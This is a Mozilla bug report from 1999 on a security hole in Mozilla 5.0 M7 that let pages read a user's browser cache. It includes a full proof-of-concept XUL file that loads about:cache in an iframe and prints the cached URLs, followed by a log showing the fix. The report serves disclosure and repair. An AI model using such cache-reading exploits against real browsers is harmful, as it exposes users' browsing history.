Closed Bug 9810 Opened 25 years ago Closed 25 years ago

Reading user's cache using XUL and iframe

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking

()

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

Details

There is a security vulnerability in Mozilla 5.0 M7 Win95 (guess all platforms),
which allows reading user's cache using XUL and iframe.
The code is:
----------------------------------cache2.xul--------------------------
<?xml version="1.0"?>
<!--
 <?xml-stylesheet href="xul.css" type="text/css"?>
-->
 <!DOCTYPE window>
 <xul:window
   xmlns:html="http://www.w3.org/TR/REC-html40"
   xmlns:xul ="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
   title = "Reading user's cache">
 <html:script>
   <![CDATA[
   function dumpCache() {
     dump("Here are some URLs from your cache:\n");
     for(i=0;i<10;i++)
       dump(window.frames[0].document.links[i].href+"\n");
   }
   ]]>
 </html:script>
 <xul:toolbox>
   <xul:toolbar>
     <xul:titledbutton
       value="Press me to dump cache"
       onclick="dumpCache()"
       style="background-color:rgb(192,192,192);"/>
   </xul:toolbar>
 </xul:toolbox>
<html:hr/>
<html:iframe type="content-primary" src="about:cache" />
<html:h3>
Press the button and look at the apprunner console to see some URLs in your cache.
</html:h3>
</xul:window>
----------------------------------------------------------------------
Status: NEW → ASSIGNED
Target Milestone: M11
Blocks: 12633
Group: netscapeconfidential?
Component: Browser-General → Security
QA Contact: leger → dshea
Updating component
Depends on: 11462
Depends on: 7254
No longer depends on: 11462
Fixed. Now we get an error from the URL checks:

->>>>>>>>>>>>>> Write Clipboard to memory
->>>>>>>>>>>>>> Read Clipboard from memory
Opening file signon.tbl failed
FindShortcut: in='http://prime/gunxul/cache1.xul '  out='null'
JavaScript Error: illegal URL method 'about:cache'
URL: http://prime/gunxul/cache1.xul
LineNo: 4

JavaScript Error: uncaught exception: [Exception... "Failure"  code: "-214746725
9" nsresult: "0x80004005 (NS_ERROR_FAILURE)"  location: "http://prime/gunxul/cac
he1.xul  Line: 4"]

Document http://prime/gunxul/cache1.xul  loaded successfully
Document: Done (0.657 secs)
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Status: RESOLVED → VERIFIED
Windows NT 1999120208 Comm
Verified
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.